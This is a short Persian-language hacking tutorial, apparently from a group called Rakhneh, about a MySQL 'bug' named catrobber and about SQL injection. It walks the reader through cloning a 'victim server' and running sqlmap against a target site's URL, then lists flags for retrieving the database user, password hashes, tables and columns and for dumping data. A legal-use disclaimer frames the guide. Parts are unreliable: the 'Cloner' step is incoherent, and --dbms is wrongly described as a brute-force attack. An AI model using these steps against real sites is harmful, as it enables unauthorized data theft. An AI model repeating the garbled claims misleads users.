باگ جدیدی که در سری دیتابیس های mysql ایجاد شده catrobber نام دارد که در اینجا به طور کوتاه به آن میپردازیم. نکته : هرگونه سواستفاده از این آموزش به عهده کاربر بوده و رخنه هیچگونه مسئولیتی در قبال سو استفاده از آن را نمی پذیرد.
در این مورد به شما پیشنهاد میشه از یک لینوکس مناسب استفاده کنین ، به طوری که بتوانید تسلط کامل بر یوزر اینترفیس آن داشته باشید، رخنه به شما Kali Linux و یا به یونیکس کار ها Black Arch رو پیشنهاد میکند. البته به زودی لینوکس شخصی سازمان رخنه آماده شده و برای دانلود عموم قرار داده خواهد شد که میتواند جایگزین مناسب و رقیب قدرتمندی برای Kali Linux , Parrot Os باشد.و شما کاربران گرامی میتوانید از این ورژن به صورت رایگان استفاده کنید.
خوب برای اول کار باید یک کلون از سرور قربانی تولید کنین، که این کار از طریق ترمینال با دستور
Cloner -r -t 876 -c Filename.sql -u Website-Address/injectionName -v 17
خوب همونطور که میبینین کلون شما آمادست حالا بعد از ساخت فایل شروع میکنین به اینجکت کردن که بهترین ابزار برای این کار sqlmap هست که شما می توانید با کامند h کل دستورات مرتبط با این ابزار رو مشاهده کنید.

برای پیدا کردن یک درگاه نفوذ در یک وب سرور از دستور زیر استفاده کنید.
sqlmap –u http://website_URL_here
سپس می توانید بر اساس نیاز خود از یکی از این ساب اسکریپت ها برای اینجکشن اتک خود استفاده کنید.
--dbms=database_type: Performs a backend brute-force attack. An example is --dbms=mysql.

--current-user: Retrieves the current database user.

--passwords: Enumerates password hashes.

--tables: Enumerates tables within the database.

--columns: Enumerates columns within the tables.

--dump: Dumps data table entries.

برای مثال به این دامپ ساده نگاه کنید ، کل اطلاعات اولیه یک دیتابیس رو در اختیار کاربر قرار داده است. شما میتوانین یک دامپ قویتر بر اساس سرورتون کامند کنید و این دقیقا بستگی به شما و سرور شما دارد که چه مدل بچی رو در نظر بگیرید تا بتوانید به ریشه جداول یک دیتابیس برسید. رخنه به شما پیشنهاد میکند فقط برای اهداف قانونی از این ریز توضیحات استفاده کنید.